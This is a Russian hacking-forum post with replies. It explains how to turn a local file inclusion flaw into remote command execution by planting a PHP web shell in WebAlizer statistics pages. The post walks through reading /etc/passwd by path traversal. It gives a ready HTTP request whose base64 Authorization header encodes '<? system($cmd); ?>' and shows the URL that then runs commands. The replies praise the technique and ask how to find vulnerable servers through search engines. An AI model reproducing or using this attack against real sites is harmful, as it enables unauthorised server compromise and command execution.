WebAlizer в помошь при Local Include
 

Часто бывает что ри нахождении уязвимости типа Local Include нет возможности закачать шелл т.е.

1) Нет форумови скриптов которые сохраняют файлы
2) Не найдены логи апача или иные места возможного залива шела или к ним нет доступа


Прорыв обороны может быть осуществлен через сервис WebAlizer.

Суть сервиса - ежедневно создавать статистику работы веб сервера анализируя его логи.
Ход действий:
1. Берем подопытный сайт с local include
Также необходимо присутствие там сервиса WebAlizer
2. Узнаем путь к папке WebAlizer'a
Для этого просто смотрим файл /etc/passwd
находим там юзверя с именем webalizer и смотрим его домашнюю папку.
3. Смотрим статистику WebAlizer'a
Осуществляем это всё через всё тотже Local Include
типа script.php?file=../../../../../../../../../../домашняя_папка_WebAlizer'a/index.html
От туда берем ссылку на статистику последнего месяца. А именно имя файла. ЧТото типа такого:usage_200804.html
4. Выбираем место для шела
Чаще всего подходящим местом бывает имя пользователя, потому что редко встречается и довольно легко попадает в таблицу статистики.
5. Заливка шела
Браузер не даст нам просто так закинуть шел в имеи пользователя, по этому сделаешь запрос в ручную.
Который потом отошлем через телнет или Ip-Tools. Промежуточный шелл будет у нас таким:
Для возможности заливки необходимо составить запрос авториации примерно такого вида:
GET / HTTP/1.1
Host: site.com
Authorization: Basic PD8gc3lzdGVtKCRjbWQpOyA/Pjo=

Эта строка представляет собой текст base64('<? system($cmd); ?>: ');
Обратити внимание на то, что в конце обязательно должно стоять двоеточие и пробел. (\\В видео есть ошибка в этом месте\\)
После отправки данного запроса необходимо подождать около суток, чтобы WebAlizer провел анализ логов апача
6. Непосредственно выполнение шела
После анализа логов будет обновлен файл статистики текущего месяца в котором будет уже наш шелл который мы выполним так:site.com/scritp.php?file=../../../../../../../../домашняя_папка_WebAlizer'a/usage_200804.html&cmd=ls

Остальное дело уже простое и банальное. ;)

опиши как найти через гугл сервак с установленным сие чудом а так статейка понравилась поставил плюсеГ

2 satana8920 Это просто один из методов. В последнее время всё чаще и чаще стал встречаться WebAlizer. Это всеголишь один из многочисленных способов заливки шелла.

это статья? еще пару строчек в дополнение к первому посту темы http://forum.antichat.ru/thread49775.html

2 c411k Это всеголишь один из вариантов того, что можно использовать при Local Include, но в отличии от других - этот более своеобразен, чем просто обычная запись в логи

Черт! Никак не могу найти топик на ачате, где написаны разнообразные пути к логам апача и другим подобным сервисам?

o_O ну так вот он же http://forum.antichat.ru/thread49775.html

Молодец хорошее оформление.
Но логи они есть логи есть очень много систем логирования в которых можно записать шелл гараздо сложнее.